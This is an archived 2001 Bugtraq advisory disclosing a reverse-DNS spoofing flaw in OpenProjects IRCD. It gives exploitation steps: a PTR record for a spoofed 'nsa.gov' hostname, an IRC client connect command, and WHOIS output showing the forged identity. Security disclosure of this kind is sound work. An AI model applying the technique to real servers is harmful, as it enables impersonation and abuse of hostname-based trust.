OpenProjects IRCD allows DNS spoofing

From: Jukka Mutex (jmutex@Aphex.NewGold.NET)
Date: 10/09/01

• Previous message: Damir Rajnovic: "Cisco Systems - Vulnerability in CDP"
• Next in thread: Matthew S. Hallacy: "Re: OpenProjects IRCD allows DNS spoofing"
• Reply: Matthew S. Hallacy: "Re: OpenProjects IRCD allows DNS spoofing"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

---

Date: Tue, 9 Oct 2001 18:45:19 GMT
From: Jukka Mutex <jmutex@Aphex.NewGold.NET>
Message-Id: <200110091845.f99IjJN74537@Aphex.NewGold.NET>
To: bugtraq@securityfocus.com
Subject: OpenProjects IRCD allows DNS spoofing

* OpenProjects.NET IRCD DNS Spoofing *

OpenProjects.net's ircd has some truly braindead code re DNS lookups
and doesn't do a proper double-reverse paranoid lookup. In fact, it
is possible to spoof any hostname that actually exists on the internet.

Here is how to exploit it.

1. Choose a Hostname to Spoof.
It is important to keep in mind that you must choose a hostname that
actually exists, for our example, we will use 'gary7.nsa.gov'

2. Point Your Reverse Lookup To The Hostname.
For our example, we will put the following in our BIND zonefile:
        47.222.42.209.in-addr.arpa. IN PTR gary7.nsa.gov.

Where we will assume you are using the same IP I used, 209.42.222.47.

3. Connect To A Vulnerable IRC Server.
BitchX -H 209.42.222.47 jmutex asimov.openprojects.net

Try a WHOIS on yourself.

/whois jmutex
| jmutex (jmutex@gary7.nsa.gov) (Government)
½ ircname : Jukka Mutex
½ server : asimov.openprojects.net (Fremont, CA)
: idle : 0 hours 0 mins 24 secs (signon: Tue Oct 9 05:32:16 2001)

Credits: jmutex@newgold.net, chrisj@newgold.net, lilo
Found by: Joseph Mallett
Affects: OpenProjects u2.10.05.18.(ipcheck4-5)
Rumored to Affect: Hybrid

Copyright (c) 2001 Joseph Mallett. All rights reserved.

---

• Previous message: Damir Rajnovic: "Cisco Systems - Vulnerability in CDP"
• Next in thread: Matthew S. Hallacy: "Re: OpenProjects IRCD allows DNS spoofing"
• Reply: Matthew S. Hallacy: "Re: OpenProjects IRCD allows DNS spoofing"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

---

Relevant Pages Re: Redirect IP to hostname ... (this is not called redirection). ... In your original post you stated you wanted to redirect an IP to a Hostname. ... This is referred to as reverse dns lookup, ... (microsoft.public.win2000.general) Re: hostname config question ... Take a look at /etc/netsvc.conf - you should be able to specify the lookup ... > We're now trying to install some awfull java-based functionality for SAP ... > hostname, it seems to work. ... > I can't seem to find a reference to 'shortname' anywhere, ... (comp.unix.aix) Re: Reverse DNS Blocking ... mail from MTAs whose IP address does not resolve via DNS. ... I receive a lot of spam from IP addresses for which there is not DNS ... FAIL permanent lookup failure ... forms a hostname lookup on the IP address of the ... (comp.mail.sendmail) Re: may be forged ... I am running sendmail 8.13.6 using masquerade config. ... FORGED forward lookup doesn't match reverse lookup ... forms a hostname lookup on the IP address of the ... If the client IP address ... (comp.mail.sendmail)

---

We are proud to have Web Hosting and Rack Housing from 9 Net Avenue Deutschland.
(17)